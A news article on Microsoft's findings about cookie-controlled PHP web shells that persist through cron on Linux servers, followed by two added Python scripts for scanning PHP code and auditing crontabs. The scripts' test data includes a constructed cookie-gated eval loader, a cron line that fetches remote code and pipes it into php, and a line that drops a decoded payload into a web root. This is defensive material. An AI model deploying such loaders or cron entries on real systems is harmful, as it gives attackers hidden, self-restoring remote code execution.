Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers


The Hacker News, Apr 3, 2026


Why It Matters

By hiding command execution in ordinary cookie traffic and automating re‑deployment via cron, attackers can sustain stealthy remote code execution, raising the risk for web‑hosting providers and enterprises running PHP applications.

Key Takeaways

  • Cookies used as covert command channel for PHP shells
  • Cron jobs recreate obfuscated loaders after removal
  • Gated activation reduces visibility in normal traffic
  • Multi‑factor authentication limits initial credential compromise
  • Monitoring cron and file changes detects persistence attempts

Pulse Analysis

The latest research from Microsoft reveals that threat actors are repurposing HTTP cookies as a silent command conduit for PHP‑based web shells on Linux hosts. The shell reads its trigger and its encoded payload from the `$_COOKIE` superglobal, so it does nothing during normal page requests and only awakens when a request carrying the crafted cookie arrives. Because cookies are rarely inspected as closely as URL parameters or request bodies, the traffic blends with legitimate sessions, slips past signature‑based scanners and raises fewer alerts in web‑application firewalls. As PHP remains a staple for many SaaS and hosting platforms, the technique poses a broad attack surface across the cloud ecosystem.
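As an added example, not code from Microsoft or The Hacker News, the Python script below scans PHP source for the pattern just described: a value read from `$_COOKIE` that gates execution, reaches `eval()`, `system()` or a similar sink, or is used as a function name, following it through simple assignments such as `$p = base64_decode($_COOKIE['x'])`. The two PHP snippets are constructed for the demonstration, and the sink list and the line-by-line taint tracking are deliberate simplifications.

```python
"""Static scan of PHP source for cookie-gated command execution.

Added example, not Microsoft's or The Hacker News' code. Flags lines where a
value read from $_COOKIE gates execution, reaches an execution sink, or is
used as a function name, following simple assignments such as
$p = base64_decode($_COOKIE['x']). Both PHP samples below are constructed.
"""
import re
from dataclasses import dataclass
from pathlib import Path

SINKS = ("eval", "assert", "system", "passthru", "shell_exec", "exec",
         "popen", "proc_open", "create_function")
COOKIE_REF = re.compile(r"\$_COOKIE\s*\[")
ASSIGN = re.compile(r"^\s*\$(\w+)\s*\.?=\s*(.+?);\s*$")   # $v = <expr>;  or  $v .= <expr>;
VAR_REF = re.compile(r"\$(\w+)")
GATE = re.compile(r"\b(?:if|elseif|while)\s*\(")
SINK_CALL = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(([^;]*)\)", re.I)
DYN_CALL = re.compile(r"\$(\w+)\s*\(")                    # $f(...): variable function call


@dataclass(frozen=True)
class Finding:
    line: int
    reason: str


def _tainted(expr: str, tainted: set[str]) -> bool:
    """True if expr reads $_COOKIE directly or names a cookie-derived variable."""
    return bool(COOKIE_REF.search(expr)) or any(v in tainted for v in VAR_REF.findall(expr))


def scan_php(src: str) -> list[Finding]:
    findings: list[Finding] = []
    tainted: set[str] = set()          # variables assigned from cookie data so far
    for n, line in enumerate(src.splitlines(), 1):
        code = line.split("//", 1)[0]  # crude: drop trailing line comments
        m = ASSIGN.match(code)
        if m and _tainted(m.group(2), tainted):
            tainted.add(m.group(1))
        if GATE.search(code) and COOKIE_REF.search(code):
            findings.append(Finding(n, "execution gated on a cookie value (weak signal alone)"))
        for name, args in SINK_CALL.findall(code):
            if _tainted(args, tainted):
                findings.append(Finding(n, f"cookie-derived data reaches {name.lower()}()"))
        for name in DYN_CALL.findall(code):
            if name in tainted:
                findings.append(Finding(n, f"function name taken from cookie-derived ${name}"))
    return findings


def scan_tree(root: Path) -> dict[Path, list[Finding]]:
    """Scan every .php file under root; only files with findings are returned."""
    out: dict[Path, list[Finding]] = {}
    for p in root.rglob("*.php"):
        hits = scan_php(p.read_text(errors="replace"))
        if hits:
            out[p] = hits
    return out


SUSPICIOUS = r"""<?php
// constructed sample of a cookie-gated loader, not a real-world artefact
if (isset($_COOKIE['session_tag']) && md5($_COOKIE['session_tag']) === '1234') {
    $p = base64_decode($_COOKIE['_ga_data']);
    @eval($p);
}
$f = $_COOKIE['fn'];
$f($_COOKIE['arg']);
"""

BENIGN = r"""<?php
$lang = $_COOKIE['lang'] ?? 'en';   // constructed: reads a cookie but never executes it
echo htmlspecialchars($lang);
"""

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, [(f.line, f.reason) for f in scan_php(src)])
```

Run `scan_tree(Path("/var/www"))` against a real document root; the "gated on a cookie" hit on its own is expected in ordinary code (any `if (isset($_COOKIE['lang']))`), so treat it as corroboration for the sink and dynamic-call findings rather than as an alert by itself.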

The researchers also documented a self‑healing persistence layer that leverages cron jobs to periodically invoke an obfuscated PHP loader. Even if defenders manually delete the malicious file, the scheduled task recreates it, restoring the foothold. Because the loader stays dormant until the correct cookie is presented, and because default web‑server access logs do not record cookie values, conventional log monitoring often misses the activation event. This separation of persistence (cron) and execution (cookie) creates a low‑noise footprint, complicating incident response and forcing security teams to broaden their detection criteria beyond URL parameters and request bodies.

Microsoft’s advisory stresses hardening of access controls and vigilant cron auditing as immediate countermeasures. Enforcing multi‑factor authentication on hosting panels, SSH, and admin interfaces reduces the chance of credential theft that often precedes shell deployment. Continuous monitoring for anomalous cron entries, unexpected or recreated PHP files in web directories, and unusual cookie patterns can surface the hidden infrastructure before it matures. Security vendors are expected to add cookie analysis to web‑application firewalls and SIEMs as the technique spreads. Developers should treat cookie values as untrusted input like any other, with the caveat that application‑level validation does not disarm a shell the attacker has already planted, since the shell reads the cookie itself; keeping the web‑server account from writing into web directories, and detecting the file drop when it happens, matter more.
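The cron-based recreation described in the previous paragraph and the cron and file monitoring recommended here can be checked with the added Python example below (not Microsoft's or The Hacker News' code). It parses crontab lines in both the system format (`/etc/crontab`, `/etc/cron.d/*`) and the per-user format, flags commands that invoke PHP under a web root, fetch-and-pipe into an interpreter, decode inline base64, or redirect output into a web root, and diffs a hashed inventory of `.php` files against a saved baseline so a file that was removed and then recreated shows up as new. The crontab text, the web-root contents and the base64 payload are constructed for the demonstration; the web-root prefixes and the allowlist are assumptions to tune per host.

```python
"""Cron audit and web-root inventory diff for web-shell persistence.

Added example, not Microsoft's or The Hacker News' code. The crontab text,
the web-root contents and the base64 payload are constructed here; web-root
prefixes and the allowlist are assumptions to tune per host.
"""
import base64
import binascii
import hashlib
import os
import re
import shlex

WEB_ROOT_PREFIXES = ("/var/www", "/srv/www", "/usr/share/nginx", "/home/")
ALLOWLIST = ("artisan schedule:run", "run-parts", "logrotate")   # known-good jobs (assumed)
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
FETCH_PIPE = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|php|perl|python)", re.I)


def parse_crontab(text: str, system_format: bool) -> list[tuple[str, str, str]]:
    """Return (schedule, user, command) per job. system_format=True for /etc/crontab
    and /etc/cron.d/* (a user field follows the schedule); False for `crontab -l`."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue                                   # blank, comment or VAR=value
        n_sched = 1 if line.startswith("@") else 5     # @reboot/@daily vs. five fields
        parts = line.split(None, n_sched + (1 if system_format else 0))
        if len(parts) < n_sched + (2 if system_format else 1):
            continue                                   # malformed line
        sched = " ".join(parts[:n_sched])
        user = parts[n_sched] if system_format else ""
        jobs.append((sched, user, parts[-1]))
    return jobs


def _decodes_to_php(token: str) -> bool:
    """True if a base64-looking token decodes to something containing a PHP open tag."""
    if not B64_TOKEN.fullmatch(token) or len(token) % 4:
        return False
    try:
        blob = base64.b64decode(token, validate=True)
    except binascii.Error:
        return False
    return b"<?" in blob


def assess_command(cmd: str) -> list[str]:
    """Reasons a cron command looks like a web-shell (re)deployer; [] if allowlisted/clean."""
    if any(ok in cmd for ok in ALLOWLIST):
        return []
    try:
        toks = shlex.split(cmd)
    except ValueError:
        toks = cmd.split()                             # unbalanced quotes: whitespace split
    reasons = []
    in_webroot = any(t.startswith(WEB_ROOT_PREFIXES) for t in toks)
    runs_php = any(re.fullmatch(r"php[\d.]*(-cli)?", os.path.basename(t)) for t in toks)
    if runs_php and in_webroot:
        reasons.append("invokes php on a file under a web root")
    if FETCH_PIPE.search(cmd):
        reasons.append("downloads and pipes into an interpreter")
    if "base64" in toks and any(t in ("-d", "-D", "--decode") for t in toks):
        reasons.append("decodes inline base64")
    if any(_decodes_to_php(t) for t in toks):
        reasons.append("inline payload decodes to PHP source")
    targets = re.findall(r">>?\s*(\S+)", cmd) + [toks[i + 1] for i, t in enumerate(toks[:-1]) if t == "tee"]
    if any(t.startswith(WEB_ROOT_PREFIXES) for t in targets):
        reasons.append("writes output into a web root")
    return reasons


def audit_crontab(text: str, system_format: bool) -> list[dict]:
    findings = []
    for sched, user, cmd in parse_crontab(text, system_format):
        reasons = assess_command(cmd)
        if reasons and sched == "* * * * *":
            reasons.append("runs every minute (typical for re-deploy loops)")
        if reasons:
            findings.append({"schedule": sched, "user": user, "command": cmd, "reasons": reasons})
    return findings


def php_inventory(files: dict[str, bytes]) -> dict[str, str]:
    """path -> sha256 of every .php file; `files` stands in for a walk of the web root."""
    return {p: hashlib.sha256(b).hexdigest() for p, b in files.items() if p.endswith(".php")}


def diff_inventory(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Files that appeared, changed or vanished since the baseline was taken."""
    return {
        "new": sorted(set(current) - set(baseline)),
        "changed": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "missing": sorted(set(baseline) - set(current)),
    }


# Constructed inputs: a harmless PHP marker, a system crontab and two web-root snapshots.
PAYLOAD_B64 = base64.b64encode(b"<?php echo 'constructed sample';\n").decode()
SAMPLE_SYSTEM_CRONTAB = f"""# constructed /etc/crontab sample
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
17 *    * * *   root      cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   www-data  /usr/bin/php /var/www/html/artisan schedule:run >> /dev/null 2>&1
* * * * *       www-data  echo {PAYLOAD_B64} | base64 -d > /var/www/html/wp-includes/.cache.php
@reboot         www-data  curl -s http://203.0.113.10/l.txt | php
"""
BASELINE_FILES = {
    "/var/www/html/index.php": b"<?php require 'wp-blog-header.php';\n",
    "/var/www/html/wp-includes/functions.php": b"<?php function wp_x() {}\n",
}
CURRENT_FILES = {**BASELINE_FILES, "/var/www/html/wp-includes/.cache.php": base64.b64decode(PAYLOAD_B64)}

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_SYSTEM_CRONTAB, system_format=True):
        print(f"[{f['schedule']}] {f['user']}: {f['command']}\n    " + "; ".join(f["reasons"]))
    print(diff_inventory(php_inventory(BASELINE_FILES), php_inventory(CURRENT_FILES)))
```

The Laravel scheduler line is exactly the kind of legitimate job that invokes PHP from a web root every few minutes, which is why the audit keeps an allowlist rather than alerting on "php under /var/www" alone; build that list from a known-good host before trusting the output. On a live system, feed `audit_crontab` the contents of `/etc/crontab`, each file in `/etc/cron.d`, and `crontab -l -u <user>` for every account, and take the inventory baseline at deployment time, storing it off the host so the cron job cannot rewrite it too.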

